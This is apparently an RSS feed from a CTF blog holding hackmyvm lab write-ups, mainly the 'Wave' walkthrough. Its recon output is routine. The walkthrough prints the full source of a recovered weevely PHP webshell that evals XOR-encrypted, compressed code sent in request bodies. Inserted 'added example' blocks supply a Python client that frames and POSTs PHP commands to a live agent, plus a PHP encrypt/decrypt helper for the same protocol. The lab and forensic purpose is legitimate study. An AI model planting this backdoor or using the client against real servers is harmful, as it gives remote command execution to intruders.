(UNKNOWN) [192.168.205.148] 79 (finger) open
Login: daemon                           Name: daemon
Directory: /usr/sbin                    Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
(UNKNOWN) [192.168.205.148] 79 (finger) open
Login: dnsmasq                          Name: dnsmasq
Directory: /var/lib/misc                Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
(UNKNOWN) [192.168.205.148] 79 (finger) open
Login: games                            Name: games
Directory: /usr/games                   Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
(UNKNOWN) [192.168.205.148] 79 (finger) open
Login: gnats                            Name: Gnats Bug-Reporting System (admin)
Directory: /var/lib/gnats               Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
(UNKNOWN) [192.168.205.148] 79 (finger) open
Login: irc                              Name: ircd
Directory: /run/ircd                    Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
(UNKNOWN) [192.168.205.148] 79 (finger) open
Login: list                             Name: Mailing List Manager
Directory: /var/list                    Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
(UNKNOWN) [192.168.205.148] 79 (finger) open
Login: lp                               Name: lp
Directory: /var/spool/lpd               Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
(UNKNOWN) [192.168.205.148] 79 (finger) open
Login: mail                             Name: mail
Directory: /var/mail                    Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
(UNKNOWN) [192.168.205.148] 79 (finger) open
Login: man                              Name: man
Directory: /var/cache/man               Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
(UNKNOWN) [192.168.205.148] 79 (finger) open
Login: messagebus                       Name: 
Directory: /nonexistent                 Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
(UNKNOWN) [192.168.205.148] 79 (finger) open
Login: news                             Name: news
Directory: /var/spool/news              Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
(UNKNOWN) [192.168.205.148] 79 (finger) open
Login: nobody                           Name: nobody
Directory: /nonexistent                 Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
(UNKNOWN) [192.168.205.148] 79 (finger) open
Login: proxy                            Name: proxy
Directory: /bin                         Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
(UNKNOWN) [192.168.205.148] 79 (finger) open
Login: root                             Name: root
Directory: /root                        Shell: /bin/bash
Never logged in.
No mail.
No Plan.
(UNKNOWN) [192.168.205.148] 79 (finger) open
Login: sshd                             Name: 
Directory: /run/sshd                    Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
(UNKNOWN) [192.168.205.148] 79 (finger) open
Login: sync                             Name: sync
Directory: /bin                         Shell: /bin/sync
Never logged in.
No mail.
No Plan.
(UNKNOWN) [192.168.205.148] 79 (finger) open
Login: sys                              Name: sys
Directory: /dev                         Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
(UNKNOWN) [192.168.205.148] 79 (finger) open
Login: systemd-coredump                 Name: systemd Core Dumper
Directory: /                            Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
(UNKNOWN) [192.168.205.148] 79 (finger) open
Login: systemd-network                  Name: systemd Network Management
Directory: /run/systemd                 Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
(UNKNOWN) [192.168.205.148] 79 (finger) open
Login: systemd-resolve                  Name: systemd Resolver
Directory: /run/systemd                 Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
(UNKNOWN) [192.168.205.148] 79 (finger) open
Login: systemd-timesync                 Name: systemd Time Synchronization
Directory: /run/systemd                 Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
(UNKNOWN) [192.168.205.148] 79 (finger) open
Login: uucp                             Name: uucp
Directory: /var/spool/uucp              Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
(UNKNOWN) [192.168.205.148] 79 (finger) open
Login: uuidd                            Name: 
Directory: /run/uuidd                   Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
(UNKNOWN) [192.168.205.148] 79 (finger) open
Login: www-data                         Name: www-data
Directory: /var/www                     Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.

```

Nothing interesting; let's look at the web service.

![Image](https://github.com/user-attachments/assets/0729089c-c77a-498c-919d-b511a966991b)

Nothing interesting there, and nothing in the source either, so let's brute-force directories:

```bash
┌──(kali㉿kali)-[~/test]
└─$ gobuster dir -u 'http://192.168.205.148' -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x php,html,txt,md
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.205.148
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,txt,md,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/backup               (Status: 401) [Size: 462]
/index.html           (Status: 200) [Size: 878]
/server-status        (Status: 403) [Size: 280]
/.html                (Status: 403) [Size: 280]

```

![Image](https://github.com/user-attachments/assets/0b5297e8-5474-4c34-a645-bc01e1b882d7)

Looks like we found the key spot. Scan the tech stack:

```bash
┌──(kali㉿kali)-[~/test]
└─$ nuclei -u 192.168.205.148                      

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.3.8

                projectdiscovery.io

[WRN] Found 2 templates with runtime error (use -validate flag for further examination)
[INF] Current nuclei version: v3.3.8 (latest)
[INF] Current nuclei-templates version: v10.1.2 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 52
[INF] Templates loaded for current scan: 7656
[INF] Executing 7276 signed templates from projectdiscovery/nuclei-templates
[WRN] Loading 380 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] Templates clustered: 1698 (Reduced 1598 Requests)
[INF] Using Interactsh Server: oast.fun
[waf-detect:apachegeneric] [http] [info] http://192.168.205.148
[ssh-sha1-hmac-algo] [javascript] [info] 192.168.205.148:22
[ssh-server-enumeration] [javascript] [info] 192.168.205.148:22 ['SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3']
[ssh-password-auth] [javascript] [info] 192.168.205.148:22
[ssh-auth-methods] [javascript] [info] 192.168.205.148:22 ['['publickey','password']']
[openssh-detect] [tcp] [info] 192.168.205.148:22 ['SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3']
[options-method] [http] [info] http://192.168.205.148 ['HEAD,GET,POST,OPTIONS']
[http-missing-security-headers:x-frame-options] [http] [info] http://192.168.205.148
[http-missing-security-headers:x-content-type-options] [http] [info] http://192.168.205.148
[http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://192.168.205.148
[http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://192.168.205.148
[http-missing-security-headers:strict-transport-security] [http] [info] http://192.168.205.148
[http-missing-security-headers:content-security-policy] [http] [info] http://192.168.205.148
[http-missing-security-headers:permissions-policy] [http] [info] http://192.168.205.148
[http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://192.168.205.148
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://192.168.205.148
[http-missing-security-headers:referrer-policy] [http] [info] http://192.168.205.148
[http-missing-security-headers:clear-site-data] [http] [info] http://192.168.205.148
[apache-detect] [http] [info] http://192.168.205.148 ['Apache/2.4.62 (Debian)']

```

No luck. I mirrored the site as well, and there is still nothing.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/nyx_APex.html</guid><pubDate>Thu, 20 Mar 2025 08:27:18 +0000</pubDate></item><item><title>Kali Linux Rescue Plan: Fixing Windows That Cannot Be Moved and Missing Control Buttons</title><link>https://7r1UMPH.github.io/post/Kali%20Linux%20-zheng-jiu-ji-hua-%EF%BC%9A-xiu-fu-chuang-kou-wu-fa-yi-dong-ji-kong-zhi-an-niu-xiao-shi-wen-ti.html</link><description>## Problem scenario

When using Kali Linux (typically with the XFCE desktop environment), you may run into a confusing problem: after logging in, application windows (such as the terminal) suddenly lose their title bar, which means the minimize, maximize and close buttons in the top-right corner disappear and windows can no longer be moved by dragging them with the mouse.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Kali%20Linux%20-zheng-jiu-ji-hua-%EF%BC%9A-xiu-fu-chuang-kou-wu-fa-yi-dong-ji-kong-zhi-an-niu-xiao-shi-wen-ti.html</guid><pubDate>Thu, 20 Mar 2025 08:25:15 +0000</pubDate></item><item><title>hmv_Wave</title><link>https://7r1UMPH.github.io/post/hmv_Wave.html</link><description># hmv_Wave

# 0. Overview

**Target machine**: [hackmyvm - Wave](https://hackmyvm.eu/machines/machine.php?vm=Wave)
**Difficulty**: Yellow
**Target IP**: 192.168.205.138
**Local IP**: 192.168.205.141

# 1. Scanning

Start with `nmap`:

```bash
┌──(kali㉿kali)-[~/test]
└─$ nmap -sS --min-rate 10000 -p- -Pn 192.168.205.138
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-18 18:30 CST
Nmap scan report for 192.168.205.138
Host is up (0.00029s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
5555/tcp open  freeciv
MAC Address: 08:00:27:37:83:76 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.58 seconds
```

Let's go to port 80 and look at the web page.

# 2. Reconnaissance

![Image](https://github.com/user-attachments/assets/fc213d31-5792-4ec3-bc4f-f8ddc75839bb)

Brute-force directories

```bash
┌──(kali㉿kali)-[~/test]
└─$ feroxbuster -u 'http://192.168.205.138/' -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x php,html,txt,md 
                                                                                                                                  
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben 'epi' Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.205.138/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php, html, txt, md]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        7l       11w      153c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter                                                                                                                                 
200      GET        3l        5w       32c http://192.168.205.138/backup/phptest.bck
200      GET        3l        6w       31c http://192.168.205.138/backup/index.bck
200      GET        2l        1w        4c http://192.168.205.138/backup/log.log
200      GET        1l        2w       18c http://192.168.205.138/backup/robots.bck
200      GET        2l       13w      833c http://192.168.205.138/backup/weevely.bck
200      GET        3l        6w       31c http://192.168.205.138/
301      GET        7l       11w      169c http://192.168.205.138/backup =&gt; http://192.168.205.138/backup/
200      GET        3l        6w       31c http://192.168.205.138/index.html
200      GET        1l        2w       18c http://192.168.205.138/robots.txt
200      GET        1l        2w       11c http://192.168.205.138/phptest.php
[####################] - 48s   311445/311445  0s      found:10      errors:0    
[####################] - 47s   311410/311410  6566/s  http://192.168.205.138/ 
[####################] - 0s    311410/311410  77852500/s http://192.168.205.138/backup/ =&gt; Directory listing (add --scan-dir-listings to scan)                           
```

Take a look at each of them. Note that `robots.txt` (18 bytes, just like `robots.bck`) says `Disallow: /backup`, which advertises the directory rather than protecting it.

```bash
┌──(kali㉿kali)-[~/test]
└─$ curl http://192.168.205.138/backup/phptest.bck
&lt;?php
print ('HELLO WORLD');
?&gt;
                                                                                                                                
┌──(kali㉿kali)-[~/test]
└─$ curl http://192.168.205.138/backup/index.bck  
&lt;h1&gt; WAVE &lt;/h1&gt;

&lt;!-- wAvE --&gt;
                                                                                                                                
┌──(kali㉿kali)-[~/test]
└─$ curl http://192.168.205.138/backup/log.log  
OK

                                                                                                                                
┌──(kali㉿kali)-[~/test]
└─$ curl http://192.168.205.138/backup/robots.bck
Disallow: /backup
                                                                                                                                
┌──(kali㉿kali)-[~/test]
└─$ curl http://192.168.205.138/backup/weevely.bck
Warning: Binary output can mess up your terminal. Use '--output -' to tell curl to output it to your terminal anyway, or consider 
Warning: '--output &lt;FILE&gt;' to save to a file.
```

We found a file; let's download it and take a look.

```bash
┌──(kali㉿kali)-[~/test]
└─$ curl http://192.168.205.138/backup/weevely.bck -o /tmp/weevely.bck
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   515  100   515    0     0   217k      0 --:--:-- --:--:-- --:--:--  251k
                                                                                                                                
┌──(kali㉿kali)-[~/test]
└─$ cd tmp                                                      
                                                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/test/tmp]
└─$ cat weevely.bck                
&lt;?php include "\160\x68\141\x72\72\57\57".basename(__FILE__)."\57\x78";__HALT_COMPILER(); ?&gt;/x�X���U��j�0ſ�)J�hB�S;���
                                                                                                                      �/�J��▒m�.��)��n�(▒��'`�=6�&amp;T�YE�p��(�q1���a'H�Pq6�.���v���/��8�ĳe��$+��s�'����5�|��H�� O����w�2%��OyTV���Q�b�A���h��=�W {��
�kЛw8�a����S�����
�fBLXx  ���Ϝ����v����m���%#,H��R#2HJ]�t�|*��������h�Ms��
                       ږ&amp;'��Y���P��B��lXw�l�e���E!S�He�2�p�7G�[N��=�-��Ƀ�i�)�[��N����7��U_�=*��Ψ�s?c((VGBMB                                                                                                                                

```
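Before handing the file to PHP, the container can be triaged from the bytes alone. The escaped string in the stub, `\160\x68\141\x72\72\57\57`, is simply `phar://` (PHP only expands these escapes inside double-quoted strings; this feed renders every quote as a single quote), so the stub does `include "phar://weevely.bck/x"` and everything after `__HALT_COMPILER();` is a phar manifest. The `/` visible right after `?&gt;` in the dump is the manifest length 0x2f, which is exactly what one entry named `x` with no alias or metadata occupies. The following is an added example, not code from the original post, from weevely or from PHP: it builds a single-entry phar in memory with the same layout (the stub and the payload are constructed stand-ins), then lists the entries, inflates the content, checks the CRC and verifies the SHA1 trailer without executing any PHP.

```python
import hashlib
import re
import zlib

# Added example, not from the original post, weevely or PHP: build a minimal
# single-entry phar in memory (same layout as weevely.bck) and parse it back
# without running PHP. Layout, following the phar file-format documentation:
#   stub ... __HALT_COMPILER(); [?>] [newline]
#   manifest: len(4) nfiles(4) api(2) flags(4) alias_len(4) alias meta_len(4) meta
#   entry:    name_len(4) name usize(4) mtime(4) csize(4) crc32(4) flags(4) meta_len(4) meta
#   file contents in manifest order, then the signature: hash, sig_type(4), "GBMB"
HALT = b"__HALT_COMPILER();"
CLOSE_TAG = b"?\x3e"          # "?" plus the closing angle bracket, escaped for this feed
SIG_SHA1 = 0x0002              # signature type stored in the trailer
ENT_GZ = 0x00001000            # entry flag: content is deflate-compressed
GLOBAL_SIGNED = 0x00010000     # global flag: archive carries a signature


def u32(b, pos):
    return int.from_bytes(b[pos:pos + 4], "little")


def p32(n):
    return n.to_bytes(4, "little")


def decode_php_escapes(s):
    """Resolve the \\ooo and \\xhh escapes PHP expands in double-quoted strings."""
    def one(m):
        return chr(int(m.group(1), 16)) if m.group(1) is not None else chr(int(m.group(2), 8))
    return re.sub(r"\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})", one, s)


def build_phar(stub, entries, compress=True):
    """entries maps file name to content bytes; returns the archive bytes."""
    blobs, table = [], b""
    for name, content in entries.items():
        if compress:
            c = zlib.compressobj(9, zlib.DEFLATED, -15)      # raw deflate, RFC 1951
            blob = c.compress(content) + c.flush()
        else:
            blob = content
        flags = 0o644 | (ENT_GZ if compress else 0)
        table += (p32(len(name)) + name.encode() + p32(len(content)) + p32(0)
                  + p32(len(blob)) + p32(zlib.crc32(content)) + p32(flags) + p32(0))
        blobs.append(blob)
    body = p32(len(entries)) + b"\x11\x00" + p32(GLOBAL_SIGNED) + p32(0) + p32(0) + table
    data = stub + p32(len(body)) + body + b"".join(blobs)
    return data + hashlib.sha1(data).digest() + p32(SIG_SHA1) + b"GBMB"


def parse_phar(data):
    """List entries, inflate them, check CRCs and the SHA1 trailer."""
    halt = data.find(HALT)
    if halt == -1:
        raise ValueError("no __HALT_COMPILER(); in file: not a phar")
    pos = halt + len(HALT)
    if data[pos:pos + 1] == b" ":                  # optional tail of the stub
        pos += 1
    if data[pos:pos + 2] == CLOSE_TAG:
        pos += 2
    if data[pos:pos + 2] == b"\r\n":
        pos += 2
    elif data[pos:pos + 1] == b"\n":
        pos += 1
    mlen = u32(data, pos)
    m = pos + 4                                     # manifest body starts here
    nfiles = u32(data, m)
    hi, lo = divmod(data[m + 4], 16)
    api = "%d.%d.%d" % (hi, lo, data[m + 5] // 16)  # nibble-packed version
    p = m + 14 + u32(data, m + 10)                  # skip the alias
    p += 4 + u32(data, p)                           # skip global metadata
    entries = []
    for _ in range(nfiles):
        name_len = u32(data, p)
        name = data[p + 4:p + 4 + name_len].decode("utf-8", "replace")
        p += 4 + name_len
        usize, mtime, csize, crc, flags, meta_len = (u32(data, p + 4 * i) for i in range(6))
        p += 24 + meta_len
        entries.append({"name": name, "usize": usize, "csize": csize, "crc32": crc,
                        "flags": flags, "mtime": mtime})
    off = m + mlen                                  # file data follows the manifest
    for e in entries:
        blob = data[off:off + e["csize"]]
        off += e["csize"]
        if (e["flags"] // ENT_GZ) % 2 == 1:
            try:
                raw = zlib.decompress(blob, -15)
            except zlib.error:
                raw = zlib.decompress(blob)         # zlib-wrapped stream, just in case
        else:
            raw = blob
        e["content"] = raw
        e["crc_ok"] = zlib.crc32(raw) == e["crc32"]
    sig_ok = None
    if data.endswith(b"GBMB") and u32(data, len(data) - 8) == SIG_SHA1:
        signed = data[:len(data) - 28]              # 20-byte digest + type + GBMB
        sig_ok = hashlib.sha1(signed).digest() == data[len(data) - 28:len(data) - 8]
    return {"stub": data[:halt + len(HALT)], "api": api, "entries": entries, "signature_ok": sig_ok}


# Constructed stand-in for weevely.bck: the same obfuscated include, one entry "x".
STUB = (b"\x3c?php include \"\\160\\x68\\141\\x72\\72\\57\\57\".basename(__FILE__).\"\\57\\x78\";"
        + HALT + b" " + CLOSE_TAG)
SAMPLE_ENTRIES = {"x": b"\x3c?php echo 'constructed payload, not the real agent';"}

if __name__ == "__main__":
    print("stub includes:", decode_php_escapes(r"\160\x68\141\x72\72\57\57") + "weevely.bck"
          + decode_php_escapes(r"\57\x78"))
    info = parse_phar(build_phar(STUB, SAMPLE_ENTRIES))
    print("api", info["api"], "signature ok:", info["signature_ok"])
    for e in info["entries"]:
        print(e["name"], e["usize"], "bytes, crc ok:", e["crc_ok"])
        print(e["content"].decode())
```

On a real capture, call `parse_phar(open(path, "rb").read())`. A `signature_ok` of False means the trailer no longer matches the bytes in front of it, i.e. the file was modified after it was generated or truncated on the way; a CRC mismatch on an entry points at the same thing for that single file.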

Part of it displays as garbage, but from the readable part we can already tell that this is probably a malicious backdoor: the escaped string in the stub decodes to `phar://`, so the file is a phar archive that includes the member `x` from inside itself. Let's try to recover it.

```bash
┌──(kali㉿kali)-[~/test/tmp]
└─$ file weevely.bck
weevely.bck: PHP phar archive with SHA1 signature
                                                                                                                                
┌──(kali㉿kali)-[~/test/tmp]
└─$ phar extract -f weevely.bck weevely.phpr
//home/kali/test/tmp/weevely.bck/x ...ok
                                                                                                                                                                                                                                           
┌──(kali㉿kali)-[~/test/tmp]
└─$ cat /home/kali/test/tmp/weevely.phpr/home/kali/test/tmp/weevely.bck/x 
&lt;?php eval('$k="3ddf0d5c";$kh="b6e7a529b6c2";$kf="d598a771749b";$p="afnqDsRcBpVmU71y";

// repeating-key XOR of $t with $k; the same routine encrypts and decrypts
function x($t,$k){
$c=strlen($k);$l=strlen($t);$o="";
for($i=0;$i&lt;$l;){
for($j=0;($j&lt;$c&amp;&amp;$i&lt;$l);$j++,$i++)
{
$o.=$t[$i]^$k[$j];
}
}
return $o;
}
// only reacts to a raw request body that contains $kh, a base64 blob, $kf
if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {
@ob_start();
// payload = base64(xor(gzcompress(php code))), executed with output buffered
@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));
$o=@ob_get_contents();
@ob_end_clean();
// reply = $p . $kh . base64(xor(gzcompress(output))) . $kf
$r=@base64_encode(@x(@gzcompress($o),$k));
print("$p$kh$r$kf");
}');
```
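The decoded source fixes the whole wire protocol: the request body must contain `kh`, a base64 blob and `kf`; the blob is `gzcompress(code)` XORed byte by byte with `k`, the key repeating; the reply is `p` + `kh` + the output encoded the same way + `kf`, and any request without that frame gets an empty response. Below is an added example, not from the original post or from weevely, that implements both sides of that framing in Python with the four constants from the extracted file; the URL passed to `send()` is an assumption and the sample output is constructed. It also shows the step that is easy to get wrong when decoding a captured reply: the base64 has to be cut out from between `kh` and `kf` first, otherwise the prefix `p` gets XORed along with it and gzuncompress fails, which shows up as garbage.

```python
import base64
import re
import zlib

# Added example, not from the original post or from weevely: the request/response
# framing implemented by the backdoor extracted above, with that file's constants.
K = b"3ddf0d5c"             # XOR key ($k)
KH = "b6e7a529b6c2"         # header marker ($kh)
KF = "d598a771749b"         # footer marker ($kf)
P = "afnqDsRcBpVmU71y"      # prefix the server puts in front of every reply ($p)
FRAME = re.compile(re.escape(KH) + r"(.+)" + re.escape(KF))   # same as /$kh(.+)$kf/


def xor(data, key=K):
    """Repeating-key XOR: the x() function of the backdoor, symmetric."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def wrap(raw):
    """base64(xor(gzcompress(raw))); PHP gzcompress() is zlib format, like zlib.compress."""
    return base64.b64encode(xor(zlib.compress(raw))).decode("ascii")


def unwrap(blob):
    """Inverse of wrap(): gzuncompress(xor(base64_decode(blob)))."""
    return zlib.decompress(xor(base64.b64decode(blob)))


def build_request(php_code):
    """Raw POST body the agent matches with preg_match: KH + wrapped code + KF."""
    return KH + wrap(php_code.encode()) + KF


def decode_request(body):
    """Server side of the above, minus eval(): recover the PHP code, or None if the
    body carries no frame (the agent then behaves like a normal page)."""
    m = FRAME.search(body)
    return unwrap(m.group(1)) if m else None


def frame_response(output):
    """What print("$p$kh$r$kf") sends back for the buffered output of the eval."""
    return P + KH + wrap(output) + KF


def parse_response(body):
    """Cut the blob out of P+KH+...+KF before decoding. Decoding the whole body
    XORs the P prefix as well and gzuncompress fails, which shows up as garbage."""
    m = FRAME.search(body)
    if m is None:
        raise ValueError("reply carries no KH...KF frame")
    return unwrap(m.group(1))


def send(url, php_code, timeout=10):
    """POST a framed command to a live agent (network call, not exercised here;
    the url is an assumption, the page does not show where the agent is served)."""
    import urllib.request
    req = urllib.request.Request(url, data=build_request(php_code).encode("ascii"), method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return parse_response(resp.read().decode("latin-1"))


if __name__ == "__main__":
    # Constructed exchange: the client frames a command, the server frames its output.
    body = build_request("echo shell_exec('id');")
    print("request body:", body)
    print("server decodes:", decode_request(body))
    reply = frame_response(b"uid=33(www-data) gid=33(www-data)\n")   # constructed output
    print("reply:", reply)
    print("client decodes:", parse_response(reply))
```

Two practical consequences follow from the code: `k`, `kh`, `kf` and `p` are literals baked into the file, so anyone holding the backdoor (an incident responder with a copy of the webroot, for instance) can decrypt every captured exchange; and the fixed `kh`/`kf` markers in the request body plus the fixed `p` + `kh` prefix in the reply are reliable content matches for an IDS rule, since the "encryption" never touches them.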

It is indeed a **webshell backdoor** (a weevely agent, going by the file name); let's try to use it.

```bash
┌──(kali㉿kali)-[~/…/kali/test/tmp/weevely.bck]
└─$ cat tool.php 
&lt;?php
$k = '3ddf0d5c';  // XOR key taken from the backdoor

// Repeating-key XOR; the same routine encrypts and decrypts
function x($t, $k)
{
    $c = strlen($k);  // key length
    $l = strlen($t);  // text length
    $o = '';

    for ($i = 0; $i &lt; $l;)
    {
        for ($j = 0; ($j &lt; $c &amp;&amp; $i &lt; $l); $j++, $i++)
        {
            $o .= chr(ord($t[$i]) ^ ord($k[$j]));
        }
    }
    return $o;
}

// "\n" must be double-quoted in PHP; inside single quotes it is printed literally
echo "Choose an operation:\n";
echo "1. Encrypt\n";
echo "2. Decrypt\n";
$choice = trim(fgets(STDIN));  // read the choice

echo "Enter the text:\n";
$input_text = trim(fgets(STDIN));  // text to encrypt or decrypt

if ($choice == 1) {
    // Encrypt: gzcompress, then XOR, then base64, the order the backdoor expects
    echo "Plaintext: " . $input_text . "\n";
    $compressed_text = gzcompress($input_text);
    $encrypted_text = x($compressed_text, $k);
    echo "Encrypted: " . base64_encode($encrypted_text) . "\n";
} elseif ($choice == 2) {
    // Decrypt: base64, then XOR, then gzuncompress
    $decoded_text = base64_decode($input_text);
    $decrypted_text = x($decoded_text, $k);

    $decompressed = @gzuncompress($decrypted_text);  // @ silences the warning on bad input

    // If decompression succeeded print that, otherwise print the raw XOR result
    if ($decompressed !== false) {
        echo "Decrypted and decompressed: " . $decompressed . "\n";
    } else {
        echo "Decrypted (could not decompress): " . $decrypted_text . "\n";
    }
} else {
    echo "Invalid option\n";
}
?&gt;
```

Encrypt and decrypt helpers (the decrypt branch prints garbage; better not to use it, or adapt it yourself).</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/hmv_Wave.html</guid><pubDate>Thu, 20 Mar 2025 08:24:13 +0000</pubDate></item><item><title>hmv_qweasd</title><link>https://7r1UMPH.github.io/post/hmv_qweasd.html</link><description># hmv_qweasd

**Target machine**: https://hackmyvm.eu/machines/machine.php?vm=Qweasd
**Difficulty**: yellow
**Target IP**: 192.168.205.217
**Attacker IP**: 192.168.205.141

---

## **1. Port enumeration and service detection**

First, use `nmap` to scan the target IP for open ports:

```bash
┌──(kali㉿kali)-[~/test]
└─$ nmap -sV -sT -O -Pn -n -p- 192.168.205.217
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-31 11:35 CST
Nmap scan report for 192.168.205.217
Host is up (0.00040s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
8080/tcp open  http    Jetty 10.0.18
MAC Address: 08:00:27:75:04:B0 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.23 seconds
                                                                 
```

The scan shows that the target has 22 (SSH, OpenSSH 8.9p1) and 8080 (HTTP, Jetty 10.0.18) open; note that the web service sits on 8080, not on 80.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/hmv_qweasd.html</guid><pubDate>Thu, 20 Mar 2025 08:21:08 +0000</pubDate></item><item><title>hmv_publisher</title><link>https://7r1UMPH.github.io/post/hmv_publisher.html</link><description># hmv_publisher

**Target machine**: https://hackmyvm.eu/machines/machine.php?vm=Leet
**Difficulty**: green
**Target IP**: 192.168.205.211
**Attacker IP**: 192.168.205.141

---

### **1. Port enumeration and service detection**

First, use `nmap` to scan the target IP for open ports with the following command:

```bash
┌──(kali㉿kali)-[~/test]
└─$ nmap -sV -sT -O -Pn -n -p- 192.168.205.211
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-29 11:31 CST
Nmap scan report for 192.168.205.211
Host is up (0.0012s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
MAC Address: 08:00:27:D4:4E:10 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.99 seconds
```

The scan shows that the target has ports 22 (SSH) and 80 (HTTP) open.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/hmv_publisher.html</guid><pubDate>Thu, 20 Mar 2025 08:20:06 +0000</pubDate></item><item><title>hmv_Principle2</title><link>https://7r1UMPH.github.io/post/hmv_Principle2.html</link><description># hmv_Principle2

# 0. Introduction

**Target machine**: [hackmyvm - Principle2](https://hackmyvm.eu/machines/machine.php?vm=Principle2)
**Difficulty**: yellow
**Target IP**: 192.168.205.247
**Attacker IP**: 192.168.205.141

---

# 1. Scanning

Start with `nmap`

```bash
┌──(kali㉿kali)-[~/test]
└─$ nmap -sT --min-rate 10000 -p- -Pn 192.168.205.247
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-12 10:45 CST
Nmap scan report for thetruthoftalos.hmv (192.168.205.247)
Host is up (0.00075s latency).
Not shown: 63482 closed tcp ports (conn-refused), 2043 filtered tcp ports (no-response)
